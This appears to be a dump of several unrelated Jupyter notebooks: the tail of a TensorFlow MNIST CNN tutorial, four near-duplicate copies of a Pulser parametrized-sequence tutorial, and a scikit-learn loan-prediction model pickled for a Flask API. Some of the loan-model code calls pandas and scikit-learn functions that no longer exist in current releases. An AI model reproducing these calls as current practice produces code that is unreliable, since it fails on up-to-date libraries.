# Only plot the valid filter-weights.
if i<num_filters:
# Get the weights for the i'th filter of the input channel.
# See new_conv_layer() for details on the format
# of this 4-dim tensor.
img = w[:, :, input_channel, i]
# Plot image.
ax.imshow(img, vmin=w_min, vmax=w_max,
interpolation='nearest', cmap='seismic')
# Remove ticks from the plot.
ax.set_xticks([])
ax.set_yticks([])
# Ensure the plot is shown correctly with multiple plots
# in a single Notebook cell.
plt.show()
def plot_conv_layer(layer, image):
"""Helper-function for plotting the output of a convolutional layer."""
# Assume layer is a TensorFlow op that outputs a 4-dim tensor
# which is the output of a convolutional layer,
# e.g. layer_conv1 or layer_conv2.
# Create a feed-dict containing just one image.
# Note that we don't need to feed y_true because it is
# not used in this calculation.
feed_dict = {images_flat: [image]}
# Calculate and retrieve the output values of the layer
# when inputting that image.
values = sess.run(layer, feed_dict=feed_dict)
# Number of filters used in the conv. layer.
num_filters = values.shape[3]
# Number of grids to plot.
# Rounded-up, square-root of the number of filters.
num_grids = math.ceil(math.sqrt(num_filters))
# Create figure with a grid of sub-plots.
fig, axes = plt.subplots(num_grids, num_grids)
# Plot the output images of all the filters.
for i, ax in enumerate(axes.flat):
# Only plot the images for valid filters.
if i<num_filters:
# Get the output image of using the i'th filter.
# See new_conv_layer() for details on the format
# of this 4-dim tensor.
img = values[0, :, :, i]
# Plot image.
ax.imshow(img, interpolation='nearest', cmap='binary')
# Remove ticks from the plot.
ax.set_xticks([])
ax.set_yticks([])
# Ensure the plot is shown correctly with multiple plots
# in a single Notebook cell.
plt.show()
plot_conv_weights(sess, weights=weights[0])
###Output
_____no_output_____
###Markdown
Because we trained the model only for a few epochs, the validation accuracy is not overwhelming. Let's train more.
###Code
do_train_step(10000, summaries_merged)
plot_conv_weights(sess, weights=weights[0])
###Output
[1250] Accuracy Training [0.919], Validation [0.922]
[1500] Accuracy Training [0.927], Validation [0.922]
[1750] Accuracy Training [0.935], Validation [0.953]
[2000] Accuracy Training [0.939], Validation [0.945]
[2250] Accuracy Training [0.942], Validation [0.961]
[2500] Accuracy Training [0.946], Validation [0.922]
[2750] Accuracy Training [0.946], Validation [0.945]
[3000] Accuracy Training [0.950], Validation [0.961]
[3250] Accuracy Training [0.949], Validation [0.953]
[3500] Accuracy Training [0.954], Validation [0.930]
[3750] Accuracy Training [0.956], Validation [0.930]
[4000] Accuracy Training [0.956], Validation [0.953]
[4250] Accuracy Training [0.957], Validation [0.961]
[4500] Accuracy Training [0.958], Validation [0.977]
[4750] Accuracy Training [0.961], Validation [0.953]
[5000] Accuracy Training [0.961], Validation [0.984]
[5250] Accuracy Training [0.963], Validation [0.953]
[5500] Accuracy Training [0.962], Validation [0.977]
[5750] Accuracy Training [0.964], Validation [0.984]
[6000] Accuracy Training [0.964], Validation [0.984]
[6250] Accuracy Training [0.964], Validation [0.961]
[6500] Accuracy Training [0.965], Validation [0.969]
[6750] Accuracy Training [0.966], Validation [0.961]
[7000] Accuracy Training [0.967], Validation [0.969]
[7250] Accuracy Training [0.968], Validation [0.953]
[7500] Accuracy Training [0.968], Validation [0.969]
[7750] Accuracy Training [0.967], Validation [0.969]
[8000] Accuracy Training [0.969], Validation [0.969]
[8250] Accuracy Training [0.970], Validation [0.969]
[8500] Accuracy Training [0.970], Validation [0.945]
[8750] Accuracy Training [0.969], Validation [0.984]
[9000] Accuracy Training [0.971], Validation [0.969]
[9250] Accuracy Training [0.971], Validation [0.977]
[9500] Accuracy Training [0.971], Validation [0.961]
[9750] Accuracy Training [0.971], Validation [0.977]
[10000] Accuracy Training [0.972], Validation [0.969]
[10250] Accuracy Training [0.973], Validation [0.977]
[10500] Accuracy Training [0.972], Validation [0.961]
[10750] Accuracy Training [0.974], Validation [0.984]
[11000] Accuracy Training [0.973], Validation [0.984]
###Markdown
Once you have trained the model for a longer period of time, you should achieve a validation accuracy above 95%. Next, we can look at how the model performs on some examples taken from the test set.
###Code
# Feed some test images into the model and get the predicted label
test_images = mnist.test.images[0:9]
# Get the true classes for those images.
test_cls_true = mnist.test.labels[0:9]
# Feed the images into the model and get the predictions
feed_dict = {images_flat: test_images}
logits_np = sess.run(logits, feed_dict)
# logits_np has shape [9, 10], find the class with the highest probability for each
test_cls_predicted = np.argmax(logits_np, axis=-1)
# then visualize
plot_images(test_images, test_cls_true, test_cls_predicted)
###Output
_____no_output_____
###Markdown
Assuming the model was trained for long enough, you should now see that the model has performed quite well on these 9 images. Maybe for a certain image you are also interested in visualizing the output of a convolutional layer, i.e. its resulting feature maps. For the first image in the test data set, i.e. the one showing number 7 in the above plot, this would look as follows:
###Code
plot_conv_layer(layer_outs[0], mnist.test.images[0])
###Output
_____no_output_____
###Markdown
That's it - we've successfully trained a convolutional neural network for classification of hand-written digits. Lastly, let's not forget to clean up after us.
###Code
# cleanup
sess.close()
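# (Optional, not part of the original tutorial:) if you intend to rebuild the model in this
# same notebook session, you can also clear the accumulated default graph afterwards with
# tf.reset_default_graph().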
###Output
_____no_output_____ |
tutorials/composition/Parametrized Sequences.ipynb | ###Markdown
Parametrized Sequences
###Code
import numpy as np
import pulser
from pulser import Pulse, Sequence, Register
from pulser.waveforms import RampWaveform, BlackmanWaveform, CompositeWaveform
from pulser.devices import Chadoq2
###Output
_____no_output_____
###Markdown
From simple sweeps to variational quantum algorithms, it is often the case that one wants to try out multiple pulse sequences that vary only in a few parameters. For this effect, the ability to make a `Sequence` **parametrized** was developed.A parametrized `Sequence` can be used just like a "regular" `Sequence`, with a few key differences. Initialization and channel declaration, for example, don't change at all:
###Code
reg = Register.square(2, prefix='q')
seq = Sequence(reg, Chadoq2)
seq.declare_channel('rydberg', 'rydberg_global')
seq.declare_channel('raman', 'raman_local')
###Output
_____no_output_____
###Markdown
Variables and Parametrized Objects The defining characteristic of a `Sequence` that is parametrized is its use of **variables**. These variables are declared within a `Sequence`, by calling:
###Code
Omega_max = seq.declare_variable('Omega_max')
ts = seq.declare_variable('ts', size=2, dtype=int)
last_target = seq.declare_variable('last_target', dtype=str)
###Output
_____no_output_____
###Markdown
The returned `Omega_max`, `ts` and `last_target` objects are of type `Variable`, and are defined by their name, size and data type. In this case, `Omega_max` is a variable of `size=1` and `dtype=float` (the default), `ts` is an array of two `int` values and `last_target` is a string.These returned `Variable` objects support simple arithmetic operations (when applicable) and, when of `size > 1`, even item indexing. Take the following examples:
###Code
t_rise, t_fall = ts # Unpacking is possible too
U = Omega_max / 2.3
delta_0 = -6 * U
delta_f = 2 * U
t_sweep = (delta_f - delta_0)/(2 * np.pi * 10) * 1000
###Output
_____no_output_____
###Markdown
Both the original `Variables` and the results of these operations serve as valid inputs for `Waveforms`, `Pulses` or `Sequence`-building instructions. We can take `Omega_max` as an argument for a waveform:
###Code
pi_wf = BlackmanWaveform.from_max_val(Omega_max, np.pi)
###Output
_____no_output_____
###Markdown
or use derived quantities, like `t_rise`, `t_fall`, `delta_0` and `delta_f`:
###Code
rise_wf = RampWaveform(t_rise, delta_0, delta_f)
fall_wf = RampWaveform(t_fall, delta_f, delta_0)
rise_fall_wf = CompositeWaveform(rise_wf, fall_wf)
###Output
_____no_output_____
###Markdown
These waveforms are *parametrized* objects, so usual attributes like `duration` or `samples` are not available, as they depend on the values of the underlying variables. Nonetheless, they can be used as regular waveforms when creating `Pulses`, which will consequently be *parametrized* too.
###Code
pi_pulse = Pulse.ConstantDetuning(pi_wf, 0, 0)
rise_fall = Pulse.ConstantAmplitude(Omega_max, rise_fall_wf, 0)
###Output
_____no_output_____
###Markdown
Constructing the Sequence Upon initialization, a `Sequence` is, by default, not parametrized. We can check this by calling:
###Code
seq.is_parametrized()
###Output
_____no_output_____
###Markdown
While it is not parametrized, it is just a normal sequence. We can do the usual stuff, like targeting a local channel, adding regular pulses, or plotting the sequence:
###Code
generic_pulse = Pulse.ConstantPulse(100, 2*np.pi, 2, 0.)
seq.add(generic_pulse, "rydberg")
seq.target("q0", "raman")
seq.add(generic_pulse, "raman")
seq.draw()
###Output
_____no_output_____
###Markdown
The `Sequence` becomes parametrized at the moment a parametrized object or variable is given to a sequence-building instruction. For example:
###Code
seq.target(last_target, "raman")
seq.is_parametrized()
###Output
_____no_output_____
###Markdown
From this point onward, functionalities like drawing are no longer available, because the instructions start being stored instead of executed on the fly. We can still check the current state of a parametrized sequence by printing it:
###Code
print(seq)
###Output
Prelude
-------
Channel: rydberg
t: 0 | Initial targets: q2, q1, q0, q3 | Phase Reference: 0.0
t: 0->100 | Pulse(Amp=6.28 rad/µs, Detuning=2 rad/µs, Phase=0) | Targets: q2, q1, q0, q3
Channel: raman
t: 0 | Initial targets: q0 | Phase Reference: 0.0
t: 0->100 | Delay
t: 100->200 | Pulse(Amp=6.28 rad/µs, Detuning=2 rad/µs, Phase=0) | Targets: q0
Stored calls
------------
1. target(last_target, raman)
###Markdown
Naturally, we can also add the parametrized pulses we previously created:
###Code
seq.add(rise_fall, "rydberg")
seq.add(pi_pulse, "raman")
###Output
_____no_output_____
###Markdown
Building Once we're happy with our parametrized sequence, the last step is to build it into a regular sequence. For that, we call the `Sequence.build()` method, in which we **must attribute values for all the declared variables**:
###Code
built_seq = seq.build(Omega_max = 2.3 * 2*np.pi, ts = [200, 500], last_target="q3")
built_seq.draw()
###Output
_____no_output_____
###Markdown
And here we have a regular sequence, built from our parametrized sequence. To create a new one with different parameters, we can simply build it again with new values:
###Code
alt_seq = seq.build(Omega_max = 2*np.pi, ts = [400, 100], last_target="q2")
alt_seq.draw()
###Output
_____no_output_____
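Since the variable values are only supplied at build time, the parameter sweeps mentioned at the start of this notebook boil down to calling `build` in a loop. A minimal sketch, with arbitrary example values for `Omega_max`:

```python
# Build one concrete sequence per Omega_max value, keeping the other variables fixed.
sweep_values = [1.0 * 2*np.pi, 1.5 * 2*np.pi, 2.0 * 2*np.pi]
swept_seqs = [
    seq.build(Omega_max=val, ts=[200, 500], last_target="q3")
    for val in sweep_values
]
```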
###Markdown
Parametrized Sequences
###Code
import numpy as np
import pulser
from pulser import Pulse, Sequence, Register
from pulser.waveforms import RampWaveform, BlackmanWaveform, CompositeWaveform
from pulser.devices import Chadoq2
###Output
_____no_output_____
###Markdown
From simple sweeps to variational quantum algorithms, it is often the case that one wants to try out multiple pulse sequences that vary only in a few parameters. For this effect, the ability to make a `Sequence` **parametrized** was developed.A parametrized `Sequence` can be used just like a "regular" `Sequence`, with a few key differences. Initialization and channel declaration, for example, don't change at all:
###Code
reg = Register.square(2, prefix='q')
seq = Sequence(reg, Chadoq2)
seq.declare_channel('rydberg', 'rydberg_global')
seq.declare_channel('raman', 'raman_local')
###Output
_____no_output_____
###Markdown
Variables and Parametrized Objects The defining characteristic of a parametrized `Sequence` is its use of **variables**. These variables are declared within a `Sequence`, by calling:
###Code
Omega_max = seq.declare_variable('Omega_max')
ts = seq.declare_variable('ts', size=2, dtype=int)
last_target = seq.declare_variable('last_target', dtype=str)
###Output
_____no_output_____
###Markdown
The returned `Omega_max`, `ts` and `last_target` objects are of type `Variable`, and are defined by their name, size and data type. In this case, `Omega_max` is a variable of `size=1` and `dtype=float` (the default), `ts` is an array of two `int` values and `last_target` is a string.These returned `Variable` objects support simple arithmetic operations (when applicable) and, when of `size > 1`, even item indexing. Take the following examples:
###Code
t_rise, t_fall = ts # Unpacking is possible too
U = Omega_max / 2.3
delta_0 = -6 * U
delta_f = 2 * U
t_sweep = (delta_f - delta_0)/(2 * np.pi * 10) * 1000
###Output
_____no_output_____
###Markdown
Both the original `Variables` and the results of these operations serve as valid inputs for `Waveforms`, `Pulses` or `Sequence`-building instructions. We can take `Omega_max` as an argument for a waveform:
###Code
pi_wf = BlackmanWaveform.from_max_val(Omega_max, np.pi)
###Output
_____no_output_____
###Markdown
or use derived quantities, like `t_rise`, `t_fall`, `delta_0` and `delta_f`:
###Code
rise_wf = RampWaveform(t_rise, delta_0, delta_f)
fall_wf = RampWaveform(t_fall, delta_f, delta_0)
rise_fall_wf = CompositeWaveform(rise_wf, fall_wf)
###Output
_____no_output_____
###Markdown
These waveforms are *parametrized* objects, so usual attributes like `duration` or `samples` are not available, as they depend on the values of the underlying variables. Nonetheless, they can be used as regular waveforms when creating `Pulses`, which will consequently be *parametrized* too.
###Code
pi_pulse = Pulse.ConstantDetuning(pi_wf, 0, 0)
rise_fall = Pulse.ConstantAmplitude(Omega_max, rise_fall_wf, 0)
###Output
_____no_output_____
###Markdown
Constructing the Sequence Upon initialization, a `Sequence` is, by default, not parametrized. We can check this by calling:
###Code
seq.is_parametrized()
###Output
_____no_output_____
###Markdown
While it is not parametrized, it is just a normal sequence. We can do the usual stuff, like targeting a local channel, adding regular pulses, or plotting the sequence:
###Code
generic_pulse = Pulse.ConstantPulse(100, 2*np.pi, 2, 0.)
seq.add(generic_pulse, "rydberg")
seq.target("q0", "raman")
seq.add(generic_pulse, "raman")
seq.draw()
###Output
_____no_output_____
###Markdown
The `Sequence` becomes parametrized at the moment a parametrized object or variable is given to a sequence-building instruction. For example:
###Code
seq.target(last_target, "raman")
seq.is_parametrized()
###Output
_____no_output_____
###Markdown
From this point onward, functionalities like drawing are no longer available, because the instructions start being stored instead of executed on the fly. We can still check the current state of a parametrized sequence by printing it:
###Code
print(seq)
###Output
Prelude
-------
Channel: rydberg
t: 0 | Initial targets: q2, q1, q0, q3 | Phase Reference: 0.0
t: 0->100 | Pulse(Amp=6.28 rad/µs, Detuning=2 rad/µs, Phase=0) | Targets: q2, q1, q0, q3
Channel: raman
t: 0 | Initial targets: q0 | Phase Reference: 0.0
t: 0->100 | Delay
t: 100->200 | Pulse(Amp=6.28 rad/µs, Detuning=2 rad/µs, Phase=0) | Targets: q0
Stored calls
------------
1. target(last_target, raman)
###Markdown
Naturally, we can also add the parametrized pulses we previously created:
###Code
seq.add(rise_fall, "rydberg")
seq.add(pi_pulse, "raman")
###Output
_____no_output_____
###Markdown
Building Once we're happy with our parametrized sequence, the last step is to build it into a regular sequence. For that, we call the `Sequence.build()` method, in which we **must attribute values for all the declared variables**:
###Code
built_seq = seq.build(Omega_max = 2.3 * 2*np.pi, ts = [200, 500], last_target="q3")
built_seq.draw()
###Output
_____no_output_____
###Markdown
And here we have a regular sequence, built from our parametrized sequence. To create a new one with different parameters, we can simply build it again with new values:
###Code
alt_seq = seq.build(Omega_max = 2*np.pi, ts = [400, 100], last_target="q2")
alt_seq.draw()
###Output
_____no_output_____
###Markdown
Parametrized Sequences
###Code
import numpy as np
import pulser
from pulser import Pulse, Sequence, Register
from pulser.waveforms import RampWaveform, BlackmanWaveform, CompositeWaveform
from pulser.devices import Chadoq2
###Output
_____no_output_____
###Markdown
From simple sweeps to variational quantum algorithms, it is often the case that one wants to try out multiple pulse sequences that vary only in a few parameters. For this effect, the ability to make a `Sequence` **parametrized** was developed.A parametrized `Sequence` can be used just like a "regular" `Sequence`, with a few key differences. Initialization and channel declaration, for example, don't change at all:
###Code
reg = Register.square(2, prefix='q')
seq = Sequence(reg, Chadoq2)
seq.declare_channel('rydberg', 'rydberg_global')
seq.declare_channel('raman', 'raman_local')
###Output
_____no_output_____
###Markdown
Variables and Parametrized Objects The defining characteristic of a parametrized `Sequence` is its use of **variables**. These variables are declared within a `Sequence`, by calling:
###Code
Omega_max = seq.declare_variable('Omega_max')
ts = seq.declare_variable('ts', size=2, dtype=int)
last_target = seq.declare_variable('last_target', dtype=str)
###Output
_____no_output_____
###Markdown
The returned `Omega_max`, `ts` and `last_target` objects are of type `Variable`, and are defined by their name, size and data type. In this case, `Omega_max` is a variable of `size=1` and `dtype=float` (the default), `ts` is an array of two `int` values and `last_target` is a string.These returned `Variable` objects support simple arithmetic operations (when applicable) and, when of `size > 1`, even item indexing. Take the following examples:
###Code
t_rise, t_fall = ts # Unpacking is possible too
U = Omega_max / 2.3
delta_0 = -6 * U
delta_f = 2 * U
t_sweep = (delta_f - delta_0)/(2 * np.pi * 10) * 1000
###Output
_____no_output_____
###Markdown
Both the original `Variables` and the results of these operations serve as valid inputs for `Waveforms`, `Pulses` or `Sequence`-building instructions. We can take `Omega_max` as an argument for a waveform:
###Code
pi_wf = BlackmanWaveform.from_max_val(Omega_max, np.pi)
###Output
_____no_output_____
###Markdown
or use derived quantities, like `t_rise`, `t_fall`, `delta_0` and `delta_f`:
###Code
rise_wf = RampWaveform(t_rise, delta_0, delta_f)
fall_wf = RampWaveform(t_fall, delta_f, delta_0)
rise_fall_wf = CompositeWaveform(rise_wf, fall_wf)
###Output
_____no_output_____
###Markdown
These waveforms are *parametrized* objects, so usual attributes like `duration` or `samples` are not available, as they depend on the values of the underlying variables. Nonetheless, they can be used as regular waveforms when creating `Pulses`, which will consequently be *parametrized* too.
###Code
pi_pulse = Pulse.ConstantDetuning(pi_wf, 0, 0)
rise_fall = Pulse.ConstantAmplitude(Omega_max, rise_fall_wf, 0)
###Output
_____no_output_____
###Markdown
Constructing the Sequence Upon initialization, a `Sequence` is, by default, not parametrized. We can check this by calling:
###Code
seq.is_parametrized()
###Output
_____no_output_____
###Markdown
While it is not parametrized, it is just a normal sequence. We can do the usual stuff, like targeting a local channel, adding regular pulses, or plotting the sequence:
###Code
generic_pulse = Pulse.ConstantPulse(100, 2*np.pi, 2, 0.)
seq.add(generic_pulse, "rydberg")
seq.target("q0", "raman")
seq.add(generic_pulse, "raman")
seq.draw()
###Output
_____no_output_____
###Markdown
The `Sequence` becomes parametrized at the moment a parametrized object or variable is given to a sequence-building instruction. For example:
###Code
seq.target(last_target, "raman")
seq.is_parametrized()
###Output
_____no_output_____
###Markdown
From this point onward, functionalities like drawing are no longer available, because the instructions start being stored instead of executed on the fly. We can still check the current state of a parametrized sequence by printing it:
###Code
print(seq)
###Output
_____no_output_____
###Markdown
Naturally, we can also add the parametrized pulses we previously created:
###Code
seq.add(rise_fall, "rydberg")
seq.add(pi_pulse, "raman")
###Output
_____no_output_____
###Markdown
Building Once we're happy with our parametrized sequence, the last step is to build it into a regular sequence. For that, we call the `Sequence.build()` method, in which we **must attribute values for all the declared variables**:
###Code
built_seq = seq.build(Omega_max = 2.3 * 2*np.pi, ts = [200, 500], last_target="q3")
built_seq.draw()
###Output
_____no_output_____
###Markdown
And here we have a regular sequence, built from our parametrized sequence. To create a new one with different parameters, we can simply build it again with new values:
###Code
alt_seq = seq.build(Omega_max = 2*np.pi, ts = [400, 100], last_target="q2")
alt_seq.draw()
###Output
_____no_output_____
###Markdown
Parametrized Sequences
###Code
import numpy as np
import pulser
from pulser import Pulse, Sequence, Register
from pulser.waveforms import RampWaveform, BlackmanWaveform, CompositeWaveform
from pulser.devices import Chadoq2
###Output
_____no_output_____
###Markdown
From simple sweeps to variational quantum algorithms, it is often the case that one wants to try out multiple pulse sequences that vary only in a few parameters. For this effect, the ability to make a `Sequence` **parametrized** was developed.A parametrized `Sequence` can be used just like a "regular" `Sequence`, with a few key differences. Initialization and channel declaration, for example, don't change at all:
###Code
reg = Register.square(2, prefix='q')
seq = Sequence(reg, Chadoq2)
seq.declare_channel('rydberg', 'rydberg_global')
seq.declare_channel('raman', 'raman_local')
###Output
_____no_output_____
###Markdown
Variables and Parametrized Objects The defining characteristic of a `Sequence` that is parametrized is its use of **variables**. These variables are declared within a `Sequence`, by calling:
###Code
Omega_max = seq.declare_variable('Omega_max')
ts = seq.declare_variable('ts', size=2, dtype=int)
last_target = seq.declare_variable('last_target', dtype=str)
###Output
_____no_output_____
###Markdown
The returned `Omega_max`, `ts` and `last_target` objects are of type `Variable`, and are defined by their name, size and data type. In this case, `Omega_max` is a variable of `size=1` and `dtype=float` (the default), `ts` is an array of two `int` values and `last_target` is a string.These returned `Variable` objects support simple arithmetic operations (when applicable) and, when of `size > 1`, even item indexing. Take the following examples:
###Code
t_rise, t_fall = ts # Unpacking is possible too
U = Omega_max / 2.3
delta_0 = -6 * U
delta_f = 2 * U
t_sweep = (delta_f - delta_0)/(2 * np.pi * 10) * 1000
###Output
_____no_output_____
###Markdown
Both the original `Variables` and the results of these operations serve as valid inputs for `Waveforms`, `Pulses` or `Sequence`-building instructions. We can take `Omega_max` as an argument for a waveform:
###Code
pi_wf = BlackmanWaveform.from_max_val(Omega_max, np.pi)
###Output
_____no_output_____
###Markdown
or use derived quantities, like `t_rise`, `t_fall`, `delta_0` and `delta_f`:
###Code
rise_wf = RampWaveform(t_rise, delta_0, delta_f)
fall_wf = RampWaveform(t_fall, delta_f, delta_0)
rise_fall_wf = CompositeWaveform(rise_wf, fall_wf)
###Output
_____no_output_____
###Markdown
These waveforms are *parametrized* objects, so usual attributes like `duration` or `samples` are not available, as they depend on the values of the underlying variables. Nonetheless, they can be used as regular waveforms when creating `Pulses`, which will consequently be *parametrized* too.
###Code
pi_pulse = Pulse.ConstantDetuning(pi_wf, 0, 0)
rise_fall = Pulse.ConstantAmplitude(Omega_max, rise_fall_wf, 0)
###Output
_____no_output_____
###Markdown
Constructing the Sequence Upon initialization, a `Sequence` is, by default, not parametrized. We can check this by calling:
###Code
seq.is_parametrized()
###Output
_____no_output_____
###Markdown
While it is not parametrized, it is just a normal sequence. We can do the usual stuff, like targeting a local channel, adding regular pulses, or plotting the sequence:
###Code
generic_pulse = Pulse.ConstantPulse(100, 2*np.pi, 2, 0.)
seq.add(generic_pulse, "rydberg")
seq.target("q0", "raman")
seq.add(generic_pulse, "raman")
seq.draw()
###Output
_____no_output_____
###Markdown
The `Sequence` becomes parametrized at the moment a parametrized object or variable is given to a sequence-building instruction. For example:
###Code
seq.target(last_target, "raman")
seq.is_parametrized()
###Output
_____no_output_____
###Markdown
From this point onward, functionalities like drawing are no longer available, because the instructions start being stored instead of executed on the fly. We can still check the current state of a parametrized sequence by printing it:
###Code
print(seq)
###Output
Prelude
-------
Channel: rydberg
t: 0 | Initial targets: q2, q1, q0, q3 | Phase Reference: 0.0
t: 0->100 | Pulse(Amp=6.28 rad/µs, Detuning=2 rad/µs, Phase=0) | Targets: q2, q1, q0, q3
Channel: raman
t: 0 | Initial targets: q0 | Phase Reference: 0.0
t: 0->100 | Delay
t: 100->200 | Pulse(Amp=6.28 rad/µs, Detuning=2 rad/µs, Phase=0) | Targets: q0
Stored calls
------------
1. target(last_target, raman)
###Markdown
Naturally, we can also add the parametrized pulses we previously created:
###Code
seq.add(rise_fall, "rydberg")
seq.add(pi_pulse, "raman")
###Output
_____no_output_____
###Markdown
Building Once we're happy with our parametrized sequence, the last step is to build it into a regular sequence. For that, we call the `Sequence.build()` method, in which we **must attribute values for all the declared variables**:
###Code
built_seq = seq.build(Omega_max = 2.3 * 2*np.pi, ts = [200, 500], last_target="q3")
built_seq.draw()
###Output
_____no_output_____
###Markdown
And here we have a regular sequence, built from our parametrized sequence. To create a new one with different parameters, we can simply build it again with new values:
###Code
alt_seq = seq.build(Omega_max = 2*np.pi, ts = [400, 100], last_target="q2")
alt_seq.draw()
###Output
_____no_output_____ |
flask_model_settle_demo/notebooks/ML Models as APIs using Flask.ipynb | ###Markdown
Machine Learning models as APIs using Flask 1. Python Environment Setup & Flask Basics 2. Creating a Machine Learning Model
###Code
import os
import json
import numpy as np
import pandas as pd
from sklearn.externals import joblib
from sklearn.model_selection import train_test_split, GridSearchCV
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.ensemble import RandomForestClassifier
from sklearn.pipeline import make_pipeline
import warnings
warnings.filterwarnings("ignore")
###Output
/Users/zhaoyadong/anaconda3/lib/python3.6/site-packages/sklearn/externals/joblib/__init__.py:15: FutureWarning: sklearn.externals.joblib is deprecated in 0.21 and will be removed in 0.23. Please import this functionality directly from joblib, which can be installed with: pip install joblib. If this warning is raised when loading pickled models, you may need to re-serialize those models with scikit-learn 0.21+.
warnings.warn(msg, category=FutureWarning)
###Markdown
- Dataset: training set and test set
###Code
!ls ../data/
data = pd.read_csv('../data/training.csv')
list(data.columns)
data.shape
###Output
_____no_output_____
###Markdown
- Find the missing values in each column
###Code
for _ in data.columns:
print("The number of null values in:{} == {}".format(_, data[_].isnull().sum()))
###Output
The number of null values in:Loan_ID == 0
The number of null values in:Gender == 13
The number of null values in:Married == 3
The number of null values in:Dependents == 15
The number of null values in:Education == 0
The number of null values in:Self_Employed == 32
The number of null values in:ApplicantIncome == 0
The number of null values in:CoapplicantIncome == 0
The number of null values in:LoanAmount == 22
The number of null values in:Loan_Amount_Term == 14
The number of null values in:Credit_History == 50
The number of null values in:Property_Area == 0
The number of null values in:Loan_Status == 0
###Markdown
- Create the `training` and `testing` datasets:
###Code
pred_var = ['Gender','Married','Dependents','Education','Self_Employed','ApplicantIncome','CoapplicantIncome',\
'LoanAmount','Loan_Amount_Term','Credit_History','Property_Area']
X_train, X_test, y_train, y_test = train_test_split(data[pred_var],
data['Loan_Status'],
test_size=0.25,
random_state=42)
###Output
_____no_output_____
###Markdown
- Write the pre-processing steps into a class: a __custom pre-processing Scikit-learn `estimator`__
###Code
from sklearn.base import BaseEstimator, TransformerMixin
class PreProcessing(BaseEstimator, TransformerMixin):
"""Custom Pre-Processing estimator for our use-case
"""
def __init__(self):
pass
def transform(self, df):
pred_var = ['Gender','Married','Dependents','Education','Self_Employed','ApplicantIncome',\
'CoapplicantIncome','LoanAmount','Loan_Amount_Term','Credit_History','Property_Area']
df = df[pred_var]
df['Dependents'] = df['Dependents'].fillna(0)
df['Self_Employed'] = df['Self_Employed'].fillna('No')
df['Loan_Amount_Term'] = df['Loan_Amount_Term'].fillna(self.term_mean_)
df['Credit_History'] = df['Credit_History'].fillna(1)
df['Married'] = df['Married'].fillna('No')
df['Gender'] = df['Gender'].fillna('Male')
df['LoanAmount'] = df['LoanAmount'].fillna(self.amt_mean_)
gender_values = {'Female' : 0, 'Male' : 1}
married_values = {'No' : 0, 'Yes' : 1}
education_values = {'Graduate' : 0, 'Not Graduate' : 1}
employed_values = {'No' : 0, 'Yes' : 1}
property_values = {'Rural' : 0, 'Urban' : 1, 'Semiurban' : 2}
dependent_values = {'3+': 3, '0': 0, '2': 2, '1': 1}
df.replace(
{
'Gender': gender_values,
'Married': married_values,
'Education': education_values,
'Self_Employed': employed_values,
'Property_Area': property_values,
'Dependents': dependent_values
}, inplace=True
)
return df.as_matrix()
def fit(self, df, y=None, **fit_params):
self.term_mean_ = df['Loan_Amount_Term'].mean()
self.amt_mean_ = df['LoanAmount'].mean()
return self
###Output
_____no_output_____
###Markdown
- Convert `y_train` and `y_test` to `np.array`:
###Code
y_train = y_train.replace({'Y':1, 'N':0}).as_matrix()
y_test = y_test.replace({'Y':1, 'N':0}).as_matrix()
###Output
_____no_output_____
###Markdown
Use a pipeline to make sure the entire data pre-processing flow is wrapped into a single `scikit-learn estimator`.
###Code
pipe = make_pipeline(PreProcessing(),RandomForestClassifier())
pipe
###Output
_____no_output_____
###Markdown
- Select parameters with grid search: use `Grid Search` to find the best hyper-parameters for the `RandomForestClassifier` (e.g. `n_estimators` and `max_depth`, as defined in the grid below):- Define the `param_grid`:
###Code
param_grid = {"randomforestclassifier__n_estimators" : [10, 20, 30],
"randomforestclassifier__max_depth" : [None, 6, 8, 10],
"randomforestclassifier__max_leaf_nodes": [None, 5, 10, 20],
"randomforestclassifier__min_impurity_split": [0.1, 0.2, 0.3]}
###Output
_____no_output_____
###Markdown
- Run the `Grid Search`:
###Code
grid = GridSearchCV(pipe, param_grid=param_grid, cv=3)
###Output
_____no_output_____
###Markdown
- Fit the model (the `pipeline estimator`):
###Code
grid.fit(X_train, y_train)
###Output
_____no_output_____
###Markdown
- Check the best parameters and score selected by Grid Search:
###Code
print("Best parameters: {}".format(grid.best_params_))
print("Validation set score: {:.2f}".format(grid.score(X_test, y_test)))
###Output
Validation set score: 0.77
###Markdown
- Load the test set:
###Code
test_df = pd.read_csv('../data/test.csv', encoding="utf-8")
test_df = test_df.head()
test_df
grid.predict(test_df)
###Output
_____no_output_____
###Markdown
__Serialize the Machine Learning Model__ 3. Saving the machine learning model: serialization and deserialization. In Python, the `pickle` module is generally used for serialization and deserialization:- Serialization is the process of converting an object into a byte stream that can be stored in a file or transmitted over a network.- Deserialization is the reverse process: extracting the object back from the byte stream.
###Code
list_to_pickle = [1, 'here', 123, 'walker']
#Pickling the list
import pickle
# Serialize the list
list_pickle = pickle.dumps(list_to_pickle)
list_pickle
###Output
_____no_output_____
###Markdown
When we load the pickle back:
###Code
# Deserialize (load the pickled bytes back)
loaded_pickle = pickle.loads(list_pickle)
loaded_pickle
###Output
_____no_output_____
###Markdown
NOTE:* When actually deploying a machine learning model, the trained model is usually serialized to a file (typically with pickle or h5py).* dill extends pickle, Python's module for serializing and deserializing Python objects, to most built-in Python types. For example, objects such as nested functions cannot be stored with pickle, but dill can handle them. dill provides the same interface as pickle, so it is enough to write `import dill as pickle` when using it.
###Code
!pip install dill
import dill as pickle
filename = 'model_v2.pk'
with open('../flask_api/models/'+filename, 'wb') as file:
pickle.dump(grid, file)
###Output
_____no_output_____
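A quick illustrative check of the difference mentioned in the note above (the helper function here is made up for the example): pickling a nested function fails with the standard `pickle` module but works with `dill`:

```python
import pickle as std_pickle   # the standard-library pickle, under a different name
import dill

def make_adder(n):
    def adder(x):             # a nested function (closure)
        return x + n
    return adder

add_five = make_adder(5)

try:
    std_pickle.dumps(add_five)            # standard pickle cannot serialize closures
except Exception as e:
    print("standard pickle failed:", e)

restored = dill.loads(dill.dumps(add_five))   # dill handles it
print(restored(10))                           # prints 15
```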
###Markdown
With this, we have serialized our best trained model to `model_v2.pk`. Before using it in Flask, let's test it first...
###Code
with open('../flask_api/models/'+filename ,'rb') as f:
loaded_model = pickle.load(f)
loaded_model.predict(test_df)
###Output
_____no_output_____
###Markdown
4. Creating an API using Flask. Our file directory structure is as shown in the figure below. There are three important parts in constructing our wrapper function, **`apicall()`**:

- Getting the **`request`** data (for which predictions are to be made)
- Loading our **`pickled estimator`**
- **`jsonify`** our predictions and send the response back with **`status code: 200`**

